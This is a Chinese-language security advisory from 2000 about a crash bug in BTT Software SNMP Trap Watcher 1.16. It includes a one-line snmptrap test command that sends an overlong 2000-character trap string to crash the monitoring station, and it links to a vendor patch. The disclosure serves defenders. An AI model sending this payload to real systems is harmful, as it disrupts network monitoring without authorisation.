发布日期：2000-02-11
更新日期：2000-02-11

受影响系统：

SNMP Trap Watcher Version 1.16

不受影响系统：

SNMP Trap Watcher Version 1.18

描述：

---

来源：Paul Timmins, <pault@timmins.net>
    
    BTT Software SNMP Trap Watcher version 1.16存在安全漏洞，允许远程用户无需登录或通知即可使Trap Watcher崩溃。
    创建一个包含超过306个字符的trap字符串，并发送到SNMP监控工作站。该软件立即会弹出"This program has performed an illegal operation"（程序非法操作）的错误消息。Linux下的"snmptrap"命令可实现这个操作。



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

snmptrap vulnerable.host community '' '' 0 0 ''
interfaces.iftable.ifentry.ifindex.1 `perl -e 'print "A"x2000'`



建议：

---

    下载并安装以下补丁程序：

    http://www.bttsoftware.co.uk/cgi-bin/download.cgi?download/snmptrap.zip



浏览次数：6868
严重程度：0（网友投票）